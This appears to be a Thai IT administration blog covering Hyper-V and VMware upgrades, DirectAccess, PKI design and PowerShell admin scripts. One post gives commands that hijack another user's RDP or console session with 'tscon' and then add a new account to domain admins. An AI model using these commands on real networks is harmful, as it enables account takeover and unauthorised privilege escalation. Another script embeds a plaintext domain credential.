Upgrade Hyper-V Cluster 2012 R2 to 2016

Upgrade Hyper-V Cluster 2012 R2 to 2016

          วันนี้ผมจะมาพูดถึงการ Migrate Hyper-V Cluster จาก 2012 R2 ไปเป็น 2016 กันนะครับ ซึ่งถือว่าค่อนข้างง่ายจากเดิมเยอะเลย โดยขั้นตอนต่างๆมีดังนี้ครับ

0. แนะนำก่อนที่จะทำการ Migrate ให้ Backup ไว้ก่อนนะครับ
1. ตรวจสอบก่อนนะครับว่า Hyper-V Cluster ของท่านก่อนจะทำการ Migrate มีเพียงพอหรือไม่ (เนื่องจากจะต้องทำการ Install Windows Server ใหม่ ทำให้ Hyper-V Cluster ของท่านจะหายไป 1 Node นั่นเองครับ)
2. เมื่อตรวจสอบแล้ว Resource พอท่านก็สามารถที่จะ Fail Over VM จาก Node ที่ท่านต้องการทำการ Install Windows Server 2016 ได้เลยและทำการ Evict Node ออกครับ
3. เมื่อ Evict Node ออก เรียบร้อยก็สามารถนำ Node นั้นมาติดตั้ง Windows Server 2016 ครับ
4. ติดตั้ง Windows Server 2016 เสร็จแล้วก็มาติดตั้ง Role Hyper-V & Feature Fail Over Cluster ต่อครับ
5. Add Node เข้ามาเป็น สมาชิกใน Cluster Group เดิมครับ
6. ย้าย VM ที่เกาะ Node ที่เป็น Windows Server 2012 R2 มาเกาะ Node ที่เป็น Windows Server 2016 แทนครับ
7. ทำการ Evict Node Windows Server 2012 R2 และทำการติดตั้ง Windows Server 2016 ครับ
8. ติดตั้ง Windows Server 2016 เสร็จแล้วก็มาติดตั้ง Role Hyper-V & Feature Fail Over Cluster ต่อครับ
9. Add Node เข้ามาเป็น สมาชิกใน Cluster Group เดิมครับ (ในที่นี้ก็จะได้ Hyper-V Cluster 2016 ครับ แต่ว่า VM ยังคงเป็น Version เดิมของ 2012 R2) ให้ทำการ Update VM ให้ Support เวอร์ชั่น 2016 ครับ (* การจะ Update VM Version นั้น VM ต้อง Shutdown)
10. ทำการ Shutdown VM และ Update VM Version ครับ

เมื่อเสร็จสิ้นกระบวนการหมดแล้วท่านก็จะได้ Hyper-V Cluster 2016 ซึ่ง VM ก็ Support Feature 2016 ด้วย ตามภาพครับ

Direct Access Solution

Direct Access Solution

          วันนี้จะมาพูดถึง Solution Direct Access กันนะครับ แต่ก่อนที่จะพูดจะขออธิบายให้ฟังกันก่อนนะครับ ว่า Direct Access นั้นคืออะไร และมีไว้ทำไมกันนะครับ

          Direct Access นั้นคือ Solution ที่เข้ามาช่วยให้คุณไม่ว่าจะอยู่ที่ไหนก็ได้ สามารถใช้งาน ทรัพยากรต่างๆภายในองค์กรได้ เสมือนว่าคุณทำงานอยู่ในองค์กรนั้นจริงๆ โดยที่ขอแค่คุณเชื่อมต่อ อินเทอร์เน็ต นั่นเอง คุณอาจเริ่มสงสัยแล้วละสิว่า มันแต่ต่างกันกับ VPN ยังไง ซึ่งสิที่ทำให้ Direct Access นั้นน่าสนใจมากกว่า VPN มีดังนี้ครับ

1. Direct Access นั้นไม่ต้อง Download Tools มาติดตั้งที่ฝั่ง Client (เงื่อนไขขอแค่ คุณมี อินเทอร์เน็ตเปิดเครื่อง Login User จาก AD คุณก็สามารถใช้งานได้แล้ว)

2. Direct Access นั้นค่อนข้างที่จะปลอดภัยกว่า VPN เนื่องด้วยมีการตรวจสอบสิทธิ์การเข้าใช้งานถึง 2 ชั้น [User Authentication & Certificate (Some Thing You Know and Some Thing You Have)] และยังเข้ารหัสการเชื่อมต่อได้ถึงปลายทางที่ติดต่อ ทำให้ปลอดภัยจากการโดนดักขโมยข้อมูล

3. Direct Access นั้นยังช่วยในเรื่องที่เมื่อองค์กรของคุณนั้นมีการ แก้ไข Group Policy ใหม่ทำให้เครื่องที่มีการในไปใช้งานนอกองค์กรนั้น ไม่สามารถรับ Policyได้ ซึ่ง VPN นั้นไม่สามารถทำได้ครับ  แต่ถ้ามีการใช้งาน Direct Access คุณก็ไม่ต้องกังวลเรื่องนั้นได้เลยครับ

Scripts Power Shell : Send Message to Another Computer

Scripts Power Shell : Send Message to Another Computer

          สวัสดีครับวันนี้ผมจะมาพูดถึงการส่ง Pop up ข้อความไปยังเครื่องปลายทางกันครับ ไว้เป็นอีกหนึ่งทางเลือกในการติดต่อกับ User ครับ



###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###///////////////////////////////......\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###


Invoke-WmiMethod ` -Path Win32_Process ` -Name Create ` -ArgumentList "msg * ..Message..." `
-ComputerName computer.contoso.com -Credential username@contoso.com

Scripts Command Line: Hijack RDP&Console Session and New Account Domain Admin

Scripts Command Line: Hijack RDP Session and New Account Domain Admin

          สำหรับวันนี้ก็จะเป็น Code Hijack กันนะครับ (ถ้าจะลองแนะนำให้ทำแค่ Environment TEST) ซึ่งเงื่อนไขมีอยู่ว่า เราจะต้องเข้าเครื่องเป้าหมายให้ได้ก่อน ไม่ว่าจะด้วย USER อะไรก็ตามและทำการตรวจสอบว่า เครื่องเป้าหมายเรานั้นมีคน Remote เข้ามาใช้งานร่วมด้วยหรือไม่ครับ ถ้ามีเราก็สามารถที่จะ สวมตัวตนเป็นเขาแทนได้ทันทีเลย [เพิ่มเติมในที่นี้ ถ้า USER ที่ Remote เข้ามามีสิทธิ์พอ เช่น Domain Admin, Enterprise Admin) ท่านก็สามารถนำ User เขามาสร้าง Account สำหรับตัวท่านเองและกำหนดสิทธิ์ให้ตัวเองได้ทันทีเลยครับ] ยังไงก็ตรวจสอบให้ดีก่อนจะใช้งานกันนะครับ

###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###/////////////////////////Hijack RDP\\\\\\\\\\\\\\\\\\\\\\\\\\\###



wmic computersystem get domain

query user

sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#46"

net start sesshijack

---------

whoami

net user xxx supersecretPassw0rd /add /dom

net group "domain admins" nopernik /add /dom


###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###//////////////////////Hijack Console \\\\\\\\\\\\\\\\\\\\\\\\###

query user

psexec -s \\localhost cmd

whoami

tscon 1 /dest:console

Scripts Power Shell :Loop For Check User last logon

Scripts Power Shell :Loop For Check User use Computer

###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###///////////////////////////////......\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###

function GetUserUseComputer

{
$computers = Get-Content D:\IPlist.csv
$ondate = get-date -Format "ddMMyy"



ForEach ($computer in $computers)
{

  try
    {
Get-WmiObject –ComputerName $computer –Class Win32_ComputerSystem | Select-Object Name,UserName
}

catch    
{
            $NOTCONNECT= "System NOPATCH:$computer"
            $NOTCONNECT| Write-Warning
            $NOTCONNECT>> "$env:USERPROFILE\Desktop\NOTCONNECT.txt"

    }
}

}


GetUserUseComputer> "$env:USERPROFILE\Desktop\GetUserUseComputer$ondate.txt"

Scripts Power Shell :Loop For Check Open Port

Scripts Power Shell :Loop For Check Open Port 

###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###///////////////////////////////......\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###

function CheckPort
   {
            # Define every server IP you need to test:
            $servers = Get-Content D:\IPlist.csv
            # Define the port number you need to test (eg: 3389 for RDP):
            $portToCheck = '3389'
            $ErrorActionPreference = 'Stop'
                foreach ($server in $servers)
                    {
                        If ( Test-Connection $server -Count 1 -Quiet)
                        {  
                        try
                            {    
                            $null = New-Object System.Net.Sockets.TCPClient -ArgumentList $server,$portToCheck
                            $props = @{
                            Server = $server
                            PortOpen = 'Yes'
                                      }
                            }                            
                        catch
                            {
                            $props = @{
                            Server = $server
                            PortOpen = 'No'
                                      }
                            }
                        }
    Else
        {      
            $props = @{
            Server = $server
            PortOpen = 'Server did not respond to ping'        
                      }
        }
    New-Object PsObject -Property $props
        }
   }
CheckPort > "$env:USERPROFILE\Desktop\CheckPort.csv"

Scripts Power Shell :Loop For Check Install KB

Scripts Power Shell :Loop For Check Install KB 

          เนื่องจากมีลูกค้าต้องการเช็คว่า ผู้ใช้งานของลูกค้าเองมีจำนวนมาก และยังขาด Tools ที่เข้ามาช่วยในการบริหารจัดการ หรือถึงไม่สามารถบริหารจัดการได้ทั่วถึง แต่ลูกค้าต้องการทราบข้อมูล ในช่วงที่มี Ransomware WannaCry ว่ามีคอมพิวเตอร์เครื่องไหนที่ Update Patch ไปแล้วบ้าง เลยทำการเขียน Scripts ไว้เพื่อทำการกวาดข้อมูลของเครื่องผู้ใช้งาน ของลูกค้าเองครับ



###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###  
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###///////////////////////////////......\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###



function Hotfixreport
    {
$computer = Get-Content D:\IPlist.csv
$MS17010= 'KB4012598', #Windows XP, Vista, Server 2003, 2008
               'KB4018466', #Server 2008
               'KB4012212', 'KB4012215', 'KB4015549', 'KB4019264', #Windows 7, Server 2008 R2
               'KB4012214', 'KB4012217', 'KB4015551', 'KB4019216', #Server 2012
               'KB4012213', 'KB4012216', 'KB4015550', 'KB4019215', #Windows 8.1, Server 2012 R2
               'KB4012606', 'KB4015221', 'KB4016637', 'KB4019474', #Windows 10
               'KB4013198', 'KB4015219', 'KB4016636', 'KB4019473', 'KB4016871', #Windows 10 1511
               'KB4013429', 'KB4015217', 'KB4015438', 'KB4016635', 'KB4019472' #Windows 10 1607, Server 2016
$ErrorActionPreference = 'Stop'


ForEach ($computer in $computers)

         {

        try
            {

            $PATCH = Get-HotFix -cn $computer  | out-string -stream | select-string -pattern $MS17010
            $PATCH  >> "$env:USERPROFILE\Desktop\PATCH.txt"
            }

        catch

            {
            $NOPATCH = "System NOPATCH:$computer"
            $NOPATCH | Write-Warning
            $NOPATCH >> "$env:USERPROFILE\Desktop\NOPATCH.txt"
            }
         
        }

    }
Hotfixreport > "$env:USERPROFILE\Desktop\Hotfixreport.txt"

Scripts Power Shell: Create .exe file for join domain

Scripts Power Shell: Create .exe file for join domain

1. สร้าง Script

File Name -> JoinDomain.ps1

###-----------------------------------------------------------###  
###--------Author : Mr.Yingkamol Prukrattanakul----###    
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###  
###------Email<yingkamol_7@hotmail.com>--------###  
###----------------------------------------------------------###  
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###  
###///////////////////////////////......\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###  

$domain = "contoso.local"
$password = "password" | ConvertTo-SecureString -asPlainText -Force
$username = "contoso\username"
$credential = New-Object System.Management.Automation.PSCredential($username,$password)
Add-Computer -DomainName $domain -Credential $credential

2. Download และติดตั้งไฟล์สำหรับแปลง PowerShell Scripts เป็น exe file

Download
อ้างอิง

3. แตกไฟล์ แล้ว สร้าง PowerShell Scripts มา แปลง

.\ps2exe.ps1 -inputfile C:\Users\XXX\Desktop\JoinDomain.ps1
-outputfile C:\Users\XXX\Desktop\JoinDomain.exe

Scripts Command Line: Install and Uninstall Trend Micro Office Scan Agent by Scripts

Scripts Command Line: Install and Uninstall Trend Micro Office Scan Agent by Scripts

          สวัสดีครับ วันนี้จะมาพูดถึง Scripts การ Install and Uninstall Trend Micro Office Scan Agent กันนะครับ เนื่องจาก มีลูกค้า ถามมาเรื่องการที่จะจัดการการในการติดตั้ง Trend Micro Office Scan ว่าสามารถทำอย่างไรได้บ้าง เพราะลูกค้านั้นมีจำนวน Computer ค่อนข้างมาก และยังไม่ได้มี Tools ที่จะใช้บริหารจัดการ Client อย่างเต็มที่ด้วย รวมถึงด้วยว่าการที่ ให้ผู้ใช้งานของลูกค้าเอง Uninstall Trend Micro Office Scan ผ่าน Control Panel แล้วติดปัญหากัน ไม่ว่าจะเป็นลบออกไม่หมดบ้าง (ติด Registry) ลบแล้วติด Password บ้าง ก็เลยได้มีการจัดเตรียม Scripts ไว้เพื่อให้ User สามารถทำการได้เอง (อันนี้เป็น Code ตัวอย่างคร่าวๆนะครับ ยังไงก็ลองเอาไปปรับใช้กันดูครับ)

:Menu

echo 1.  Uninstall TrendMicro.

echo 2.  Install TrendMicro.

echo 9.  Exit

set /p choice= Please Select Menu:

if %choice%==1 GOTO UninstallTrendMicro

if %choice%==2 GOTO InstallTrendMicro

if %choice%==9 GOTO Exit

if %choice%==null GOTO Exit

rem *************************************************************

:Exit

exit

:UninstallTrendMicro

cls

echo 1.  Uninstall TrendMicro on Windows 32bit

echo 2.  Uninstall TrendMicro on Windows 64bit

echo 9.  Menu

set /p UninstallTrendMicroChoice= Please Select Menu:

if %UninstallTrendMicroChoice%==1 GOTO UninstallTrendMicrox86

if %UninstallTrendMicroChoice%==2 GOTO UninstallTrendMicrox64

if %UninstallTrendMicroChoice%==9 GOTO Menu

if %UninstallTrendMicroChoice%==null GOTO Exit

:UninstallTrendMicrox86

"%programfiles%\Trend Micro\OfficeScan Client\pccntmon" -n
ping 1.1.1.1 -n 1 -w 5000>null

reg add HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc. /v "Allow Uninstall" /t REG_DWORD /d 1 /f

"%programfiles%\Trend Micro\OfficeScan Client\NTRmv.exe"

echo *************************************************************

set /p afterUninstallTrendMicrox86= Do you Want to use other menu? [Y/N]?

if /i "%afterUninstallTrendMicrox86%" EQU "Y" GOTO :Menu

if /i "%afterUninstallTrendMicrox86%" EQU "N" GOTO :Exit

:UninstallTrendMicrox64

"%programfiles(x86)%\Trend Micro\OfficeScan Client\pccntmon" -n
ping 1.1.1.1 -n 1 -w 5000>null

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432node\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc. /v "Allow Uninstall" /t REG_DWORD /d 1 /f

"%programfiles(x86)%\Trend Micro\OfficeScan Client\NTRmv.exe"

echo *************************************************************

set /p afterUninstallTrendMicrox64= Do you Want to use other menu? [Y/N]?

if /i "%afterUninstallTrendMicrox64%" EQU "Y" GOTO :Menu

if /i "%afterUninstallTrendMicrox64%" EQU "N" GOTO :Exit

:InstallTrendMicro

cls

echo 1.  InstallTrendMicro on Windows 32bit

echo 2.  InstallTrendMicro on Windows 64bit

echo 9.  Menu

set /p InstallTrendMicroChoice= Please Select Menu:

if %InstallTrendMicroChoice%==1 GOTO InstallTrendMicrox86

if %InstallTrendMicroChoice%==2 GOTO InstallTrendMicrox64

if %InstallTrendMicroChoice%==9 GOTO Menu

if %InstallTrendMicroChoice%==null GOTO Exit

:InstallTrendMicrox86
cls
echo 0. Manu
echo 1. Contoso_HQ_01

set /p InstallTrendMicroChoice= Please Select Menu:

if %InstallTrendMicroChoice%==0 GOTO Menu

if %InstallTrendMicroChoice%==1 GOTO Contoso_HQ_01x86

:Contoso_HQ_01x86

msiexec /i http://Contoso_HQ_01:8080/officescan/download/agent_cloud_x86.msi PROPERTY=VALUE

echo *************************************************************

set /p afterContoso_HQ_01x86= Do you Want to use other menu? [Y/N]?

if /i "%afterContoso_HQ_01x86%" EQU "Y" GOTO :Menu

if /i "%afterContoso_HQ_01x86%" EQU "N" GOTO :Exit

:InstallTrendMicrox64
cls
echo 0. Manu
echo 1. Contoso_HQ_01

set /p InstallTrendMicroChoice= Please Select Menu:
if %InstallTrendMicroChoice%==0 GOTO Menu

if %InstallTrendMicroChoice%==1 GOTO Contoso_HQ_01x86

:Contoso_HQ_01x64

msiexec /i http://Contoso_HQ_01:8080/officescan/download/agent_cloud_x64.msi PROPERTY=VALUE

echo *************************************************************

set /p afterContoso_HQ_01x64= Do you Want to use other menu? [Y/N]?

if /i "%afterContoso_HQ_01x64%" EQU "Y" GOTO :Menu

if /i "%afterContoso_HQ_01x64%" EQU "N" GOTO :Exit

Update VMWare ESX 5.1 to 5.5 use VCenter 5.5

Upgrade VMWare ESX 5.1 to 5.5 use VCenter 5.5

          วันนี้ผมจะมาพูดถึงการ Update VMWare ESX จาก เวอร์ชั่น 5.1 ไปยัง 5.5 โดยใช้ VCenter 5.5 ในการจัดการนะครับ สำหรับคนที่ต้องการ Update VMWare ESX จาก เวอร์ชั่น 4.1 ไปยัง 5.5 สามารถดูได้จาก คลิก ซึ่งผมได้ทำไว้เรียบร้อยแล้วครับ โดยการ Update VMWare ESX จาก เวอร์ชั่น 5.1 ไปยัง 5.5 นั้นไม่มีความต้องการอะไรเพิ่มเติม ท่านจึงสามารถที่จะทำการ Upgrade ได้เลยครับ โดยวิธีการคร่าวๆจะมีดังนี้ครับ

          1. Scan Host ว่าพร้อมที่จะทำการ Upgrade Baseline ESX 5.5 หรือไม่ครับ

          2. Remediate Host และเลือก Upgrade Baseline ESX 5.5

Upgrade Baseline VMWare ESX 5.1 to 5.5

Upgrade VMWare ESX 4.1 to 5.5 use VCenter 5.5

Upgrade VMWare ESX 4.1 to 5.5 use VCenter 5.5

          วันนี้ผมจะมาพูดถึงการ Update VMWare ESX จาก เวอร์ชั่น 4.1 ไปยัง 5.5 โดยใช้ VCenter 5.5 ในการจัดการนะครับ สาเหตุที่มาพูดเรื่องนี้ในวันนี้ เนื่องจากมีลูกค้ามาถามผม เรื่องการ Update VMWare ESX ว่าสามารถทำได้หรือไม่ครับ เพราะจำนวน VMWare ESX ของลูกค้านั้น ค่อยข้างมาก รวมถึงสถานที่ตั้งแต่ละเครื่องนั้นค่อนข้างห่างกันมาก ผมจึงได้เสนอให้ใช้ VCenter มาเป็นตัวช่วยในการบริหารจัดการเรื่องการ Update VMWare ESX ครับ

          ก่อนอื่นเลยท่านจะต้องทำการติดตั้ง VCenter รวมถึงติดตั้ง Tools ที่ชื่อว่า VCenter Update Manager เพิ่มด้วยครับ เพื่อใช้ในการ Update VMWare ESX ซึ่งในการ Update VMWare ESX จาก 4.1 มายัง 5.5 นั้น มีความต้องการเพิ่มเติมด้วย ซึ่งท่านจะต้องทำก่อน ถึงจะสามารถ Update VMWare ESX 4.1 เป็น VMWare ESX 5.5 ได้ครับ โดยความต้องการมีดังนี้

          1.  Update Patch  Baseline (Security) เนื่องจาก VMWare ESX 5.5 นั้นมีการเปลี่ยนแปลงเรื่องการเข้ารหัส Password เลยทำให้ต้องทำการ Update Patch  Baseline (Security)  ด้วย

          2.  เมื่อทำการ Update Patch  Baseline (Security)  เสร็จเรียบร้อยแล้ว ท่านก็สามารถ Upgrade Baseline จาก VMWare ESX 4.1 to 5.5 ซึ่งผมได้มีภาพประกอบ คร่าวๆ ตามด้านล่างนี้ครับ

          เมื่อพูดถึงความต้องการแล้ว ผมจะมาพูดถึงวิธีการครับ โดยวิธีการคร่าวๆจะมีดังนี้ครับ

          1. Scan Host ว่าพร้อมที่จะทำการ Update Baseline (Security) หรือไม่ครับ

          2. Remediate Host และเลือก Security Baseline

          3. Scan Host ว่าพร้อมที่จะทำการ Upgrade Baseline ESX 5.5 หรือไม่ครับ

          4. Remediate Host และเลือก Upgrade Baseline ESX 5.5

Update Patch  Baseline (Security)

Upgrade Baseline VMWare ESX 4.1 to 5.5

Zone Transfers Active Directory to F5

     วันนี้ผมจะมาพูดถึงการ ทำ Zone Transfers จาก AD มายัง F5 ในกรณีที่ต้องการให้ Client ทั้งหมดมาใช้งาน DNS Client ชี้มายัง F5 ในการใช้งานกันนะครับ เนื่องจากมีลูกค้าต้องการใช้งาน F5 แต่ติดปัญหาที่ว่า Domain Name Private และ Public ชื่อเดียวกัน ผมก็เลยแนะนำทางออกและหา Solution ที่คิดว่าผลกระทบน้อยที่สุดมาช่วย Support ทางลูกค้าครับ โดยมี Solution ที่ได้แจ้งลูกค้าดังต่อไปนี้

1. Re-Name Domain Name (Active Directory)

2. Migrate Cross Forest

3. Zone Transfer จาก AD ไปยัง F5 

     โดยจาก Solution ทั้งหมดนั้นเมื่อตรวจสอบ Environment ลูกค้าและพบว่ามีผลกระทบและใช้ระยะเวลา ในการทำ จึงได้หาทางออกใน solution ที่3 ให้กับทางลูกค้าครับ จากนี้ก็จะเป็นภาพการ Design และ Environment TEST ที่ผมตั้งขึ้นมาไว้สำหรับทดสอบกันให้ดูนะครับ

Design Zone Transfers Active Directory to F5

Login เพื่อเข้าใช้งาน F5

Add License F5 เพื่อใช้งาน และ Enable GTM ขึ้นมาใช้งาน

ไปที่ Domain Controller และเปิด DNS --> Domain Name --> Property --> Zone Transfers และทำการ Add IP ของ F5 เข้าไป

1. Create Listener List

2. Create Name Server List

3. Create Zone List

4. Select Record Creation Method เป็น Transfer From Server (ต้อง ตั้งค่าที่ Domain Controller Transfer Zone มายัง F5 ก่อนถึงจะสามารถทำได้)

5. DNS Client ชี้ไปที่ F5 (network ขาฝั่ง internal)

6. Join Domain

Design Active Directory Certificate Services

Design Active Directory Certificate Services

          วันนี้จะมาพูดถึงการ Design  Active Directory Certificate Services แต่ก่อนจะเริ่มพูดถึงการ Design ผมขออธิบายให้ทุกท่านเข้าใจก่อนนะครับว่า Active Directory Certificate Services คืออะไร และมีไว้ทำไม

           Active Directory Certificate Services คือ การให้บริการและการบริหารจัดการ ที่เกี่ยวข้องกับ Certificate ที่จะนำไปใช้งานร่วมกับ Software Security ต่างๆ ไม่ว่าจะเป็น Single Sign On, SSL, Dot1X Authentication เป็นต้น ในการตรวจสอบตัวตน และยืนยันตัวตน โดยการออก Certificate นั้นใช้เทคโนโลยีของ Public Key Infrastructure (PKI) ในการ Generate Key เพื่อในการใช้งานครับ

           ในการ Design นั้นส่วนใหญ่ก็จะขึ้นอยู่กับลักษณะขององค์กร ครับ โดยการ Design นั้นควรที่จะแบ่งออกมาเป็นดังต่อไปนี้

1. Root Tier (Root CAs) แนะนำให้ท่านตั้งเป็น Standard Root CAs (Offiline Mode) เนื่องจาก Root CAs จะทำหน้าที่ ในการถือ Primary Key (*ถ้าต้องการด้านความปลอดภัยเพิ่ม แนะนำให้ เอา Primary Key มาเก็บกับอุปกรณ์ HSM : Hardware Security Module ครับ) 

2. Issuer Tier ทำหน้าที่ในการบริหารจัดการ Certificate ครับ

3. Front End Tier ทำหน้าที่ในการ ขอออกใบ Certificate และตรวจสอบ ความถูกต้องของ Certificate ครับ เช่น Certificate นั้นหมดอายุหรือยัง รวมถึง มีการไม่อนุญาติให้ใช้งาน Certificate นั้นไปแล้วหรือยังครับ

4. DMZ Tier จะเป็นในส่วนของที่องค์กรท่านมีการนำ Certificate ไปใช้งานภายนอกองค์กร จะต้องมีการตรวจสอบอยู่เสมอว่า Certificate ของท่านถูกต้องหรือไม่ครับ

           แต่ว่าส่วนใหญ่ที่ผมสัมผัสกับ องค์กรต่างๆนั้น มักจะ Design แค่ว่า ตั้ง Root CAs เครื่องเดียวและทำทุกอย่างเลยไม่ว่าจะ เป็น บริหารจัดการ Certificate (Issuer), ขอออกใบ Certificate (Web Enroll), ตรวจสอบใบ Certificate (CDP/AIA) ซึ่งถ้าในทางการใช้งานสามารถทำได้นะครับ แต่ผมไม่แนะนำให้ทำ เนื่องจากไม่ปลอดภัย เพราะมีโอกาสที่ Primary Key ที่เก็บอยู่ที่ Root CAs ของท่านจะหลุดได้ครับ

ก็เสมือนกับว่า ท่านทำกุญแจ หายไปนั่นเอง ซึ่งคนที่ได้กุญแจไป ก็จะเข้ามาเมื่อไรก็ได้ครับ

Installation VCenter 6.5 on Windows Server

Installation VCenter 6.5 on Windows Server

     วันนี้จะมาพูดถึงการติดตั้ง VCenter 6.5 บน Windows Server 2012 R2 กันครับ โดยเหตุผลในการที่จะต้องใช้งาน VCenter นั้นได้อธิบายไปแล้วครับ คลิก ซึ่งใน VCenter 6.5 นั้นจะสามารถ Support VMWare ESX 5.5 ขึ้นไปครับ โดยท่าสามารถติดตั้งได้ ตามนี้ครับ

Installation VCenter 5.5 on Windows Server

Installation VCenter 5.5 on Windows Server

     วันนี้จะมาพูดถึงการติดตั้ง VCenter 5.5 บน Windows Server 2008 R2 กันครับ ซึ่ง VCenter 5.5 นั้น จะ Support VMWare ESX 5.5 และต่ำกว่าลงไปครับ โดยถ้าท่านมี VMWare ESX ที่เวอร์ชั่น สุงกว่า VMWare ESX 5.5 นั้นท่านอาจต้องไปใช้ VCenter 6.5 ครับ วิธีการติดตั้ง VCenter 6.5

     ก่อนจะพูดถึงการติดตั้งนั้น ท่านจะต้องทราบก่อนว่าทำไมเราถึงต้องใช้งาน VCenter ด้วย ทั้งๆที่เรามีแค่ VMWare ESX ก็พอต่อการใช้งาน ซึ่งผมจะชี้แจงเหตุผลให้ดังนี้ครับ

 1. ถ้าในองค์กรของท่านมี VMWare ESX หลายเครื่อง การบริหารจัดการก็ยาก ที่จะดูแล เนื่องจากต้องเข้าไปทีละเครื่องเพื่อทำการตรวจสอบ นี่จึงเป็นอีกเหตุผลหนึ่งในการนำ VCenter มาใช้งานในองค์กรของท่านครับ (ในการบริหารจัดการ VMWare ESX จำนวนมากๆ)

 2. ถ้าท่านต้องการที่จะทำ High Availability ในกรณีที่ VMWare ESX (Host) ของท่านมีปัญหา ไม่ว่าจะด้วย Hardware Failed, System Error เกิดขึ้น แน่นอนว่าถ้า VM ที่ใช้งานอยู่บน HOST นั้นมีปัญหา VM นั้น ก็จะไม่สามารถใช้งานได้ด้วย แต่ว่า ถ้าท่านนำ VCenter มาใช้งานในการทำ Solution High Availability ถ้า VMWare Host ของท่านมีปัญหา VM ที่อยู่ใน VMWare Host นั้นก็จะย้ายไปทำงานที่ VMWare Host ที่ใช้งานได้แทนครับ ระบบงานของท่านก็ยังดำเนินการต่อไปได้นั้นเอง (SLA: Solution HA)

 3. ถ้า Site ที่ท่านทำงานอยู่ มีปัญหา ไม่ว่าจะอาคารถล่ม โดนปิดไม่สามารถเข้าไปในตัวอาคารที่ทำงานได้  แต่ธุรกิจองค์กรของท่าน ยังต้องดำเนินการต่อ นี่ก็คืออีกหนึ่งเหตุผลในการใช้งาน VCenter ครับ คือท่านสามารถย้ายระบบของท่าน ไปทำงานที่ DR Site ได้นั่นเองครับ (SLA: DR Site)

   ซึ่งเมื่อท่านทราบเหตุผลในการที่จะใช้งาน VCenter กันแล้ว ก็จะมาพูดถึงการติดตั้ง VCenter กันครับโดยท่านก็สามารถ คลิกที่ไฟล์ติดตั้งได้เลยครับ เมื่อคลิกที่ไฟล์ติดตั้งแล้วก็จะขึ้น Wizard ตามภาพ โดยจากภาพจะมีการติดตั้ง Tools เพิ่มในการ Update VMWare ESX